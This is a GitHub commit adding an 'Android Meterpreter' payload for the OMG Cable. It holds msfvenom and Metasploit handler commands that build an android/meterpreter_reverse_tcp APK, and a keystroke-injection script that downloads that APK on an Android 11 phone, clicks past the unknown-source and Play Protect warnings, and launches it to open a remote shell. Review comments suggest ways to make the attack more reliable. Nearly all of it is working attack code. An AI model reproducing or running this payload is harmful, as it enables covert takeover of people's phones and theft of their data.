Merge pull request #11 from int0x80/android-meterpreter

Android Meterpreter
OMG-MG 2022-01-13 19:22:45 -08:00 committed by GitHub
commit 54fef53fb3
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 169 additions and 0 deletions


@ -0,0 +1,39 @@
# Android Meterpreter
An OMG Cable payload which downloads and installs an APK onto an Android device. Here are the high-level notes.
I would like to see operating systems prompt for authentication when performing risky behaviors, such as installing a new app.
## Generate Payload
Regular `msfvenom` payload generation.
```D
$ msfvenom -p android/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=5555 -o /data/omg.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 79592 bytes
Saved as: /data/omg.apk
```
## Handler
These instructions can also be saved and loaded as an `rc` file via `msfconsole -r`.
```
$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload android/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lport 5555
msf6 exploit(multi/handler) > set lhost eth0
msf6 exploit(multi/handler) > run
```
## Miscellaneous
Some apparent artifacts remain. This is an abbreviated list.
* Notification shows apk was downloaded
* APK remains installed as MainActivity
* `app_uninstall com.metasploit.stage` does not remove the apk
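Review bot: the `msfvenom` block is fenced as ```` ```D ````, which renders a shell transcript as D source, while the handler block two sections down is untagged; tag both as ```` ```sh ```` (or leave both untagged) so the README is consistent. The README also never states what the companion payload needs from the target, even though it is the only user-facing doc in this PR: that the script targets Android 11, that it assumes Chrome is the browser (the payload walks Chrome's "approved source" install prompt), and that the `STRING https://x.x.x.x/your-app.apk` URL in the payload must be edited to serve the `/data/omg.apk` produced by the "Generate Payload" step. A short "Requirements" paragraph under the intro would cover all three. In "Miscellaneous", "`app_uninstall com.metasploit.stage` does not remove the apk" should say what does (manual removal through Settings, or `adb uninstall` when available), otherwise the reader is left with an installed implant and no cleanup path.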


@ -0,0 +1,130 @@
REM # -----------------------------------------------------------
REM # Title: OMG Android Meterpreter
REM # Description: Download and install an APK on Android
REM # Author: int0x80
REM # Target: Android 11
REM # Notes: Set URL for APK payload below
REM # -----------------------------------------------------------
REM # -----------------------------------------------------------
REM # Launch browser to APK destination
REM # -----------------------------------------------------------
GUI b
DELAY 1000
CTRL l
DELAY 50
STRING https://x.x.x.x/your-app.apk
DELAY 50
ENTER
DELAY 2000
REM # -----------------------------------------------------------
REM # Move focus to 'Open' link
REM # -----------------------------------------------------------
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
RIGHT
DELAY 50
ENTER
DELAY 500
REM # -----------------------------------------------------------
REM # Select Chrome as approved source to install apps
REM # -----------------------------------------------------------
ENTER
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
REM # -----------------------------------------------------------
REM # Finish approved source
REM # GUI DELETE might work here
REM # -----------------------------------------------------------
GUI TAB
DELAY 50
ENTER
DELAY 50
REM # -----------------------------------------------------------
REM # Scanning and Play Store warnings
REM # Install, Install Anyway, Don't send for scanning, Open
REM # -----------------------------------------------------------
RIGHT
DELAY 50
ENTER
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
ENTER
DELAY 250
REM # -----------------------------------------------------------
REM # Accept access settings and Continue
REM # -----------------------------------------------------------
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
ENTER
DELAY 250
REM # -----------------------------------------------------------
REM # Get shell and obligatory calc
REM # -----------------------------------------------------------
ENTER
DELAY 250
GUI a
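Review bot: the only wait for the APK download is the `DELAY 2000` after `ENTER` on the URL; on anything slower than a local link the "Open" control that the following nine `TAB`s and `RIGHT` are aimed at is not yet on screen, and every later keystroke lands on the wrong element. Raise that delay substantially (or add a longer `DELAY` immediately before the first `TAB` of the "Move focus to 'Open' link" block) and say in the header that the timing was tuned for a fast network. The header should also state the Chrome dependency explicitly, since "Select Chrome as approved source to install apps" only works if `GUI b` opens Chrome, and should mark the `STRING https://x.x.x.x/your-app.apk` line as the placeholder the "Set URL for APK payload below" note refers to. Finally, `REM # GUI DELETE might work here` in the "Finish approved source" block is an untested alternative left in a shipped payload; either verify and use it, or remove the remark so nobody copies it as a working step.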